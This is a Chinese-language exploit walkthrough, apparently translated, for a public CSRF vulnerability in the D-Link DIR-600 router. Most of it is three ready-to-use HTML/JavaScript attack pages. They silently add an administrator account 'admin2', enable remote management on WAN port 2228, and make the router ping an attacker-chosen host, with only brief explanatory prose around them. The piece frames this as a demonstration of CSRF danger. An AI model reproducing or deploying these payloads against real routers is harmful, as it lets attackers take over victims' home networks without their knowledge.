1,介绍
本文的目的是展示CSRF漏洞的危害,以D-link的DIR-600路由器(硬件版本:BX,固件版本:2.16)的CSRF漏洞为例。
D-link的CSRF漏洞已经是公开的,本文将详细描述一下整个D-link CSRF漏洞的利用,如何通过CSRF漏洞实现远程管理访问D-link路由器。
2,CSRF漏洞说明
如果某些request请求中没有csrf token或不需要密码授权,会存在CSRF漏洞,该漏洞允许攻击者伪造登录用户发送请求,因此可以导致用户执行攻击者想要的操作请求。
通过D-link 管理面板的CSRF漏洞,攻击者可以做以下操作:
@1,添加一个新的管理帐号;
@2,启用路由器的远程管理;
@3,ping特定的机器;此操作只需要登录路由器就可以实现,需要知道路由器的WAN IP地址。
3,PART1:给路由器增加一个新的管理帐号
需要两个request请求来完成
REQUEST1:
<html><body><script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/hedwig.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
xhr.withCredentials = "true";
var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+"<postxml>"+"<module>"+"<service>DEVICE.ACCOUNT</service>"+"<device>"+"<account>"+"<seqno/>"+"<max>1</max>"+"<count>2</count>"+"<entry>"+"<name>admin</name>"+"<password>==OoXxGgYy==</password>"+"<group>0</group>"+"<description/>"+"</entry>"+"<entry>"+"<name>admin2</name>"+"<password>pass2</password>"+"<group>0</group>"+"<description/>"+"</entry>"+"</account>"+"<session>"+"<captcha>0</captcha>"+"<dummy/>"+"<timeout>180</timeout>"+"<maxsession>128</maxsession>"+"<maxauthorized>16</maxauthorized>"+"</session>"+"</device>"+"</module>"+"<module>"+"<service>HTTP.WAN-1</service>"+"<inf>"+"<web>2228</web>"+"<weballow>"+"<hostv4ip/>"+"</weballow>"+"</inf>"+"</module>"+"<module>"+"<service>HTTP.WAN-2</service>"+"<inf>"+"<web>2228</web>"+"<weballow>"+"<hostv4ip/>"+"</weballow>"+"</inf>"+"</module>"+"</postxml>";
xhr.send(body);
}</script><form action="#"><input type="button" value="Submit request1" onclick="submitRequest();" /></form></body></html>REQUEST2:
<html><body><script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/pigwidgeon.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}</script><form action="#"><input type="button" value="Submit request2" onclick="submitRequest();" /></form></body></html>REQUEST1和REQUEST2中,默认的路由局域网IP地址是192.198.0.1,管理帐号是admin,REQUEST1中的request请求中,当密码字段为==OoXxGgYy==的时候,是不会修改admin帐号的密码的。这两个请求完成了管理帐号admin2的添加,同时启用了远程管理端口2228.
PART2:ping特定的主机
REQUEST3:
<html><body><script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://192.168.0.1/diagnostic.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}</script><form action="#"><input type="button" value="Submit request3" onclick="submitRequest();" /></form></body></html>只需要求该代码中的X.Y.Z.W为你需要ping的主机IP地址就可以。
本文由阿德马童鞋翻译自国外网站,转载请注明出处~
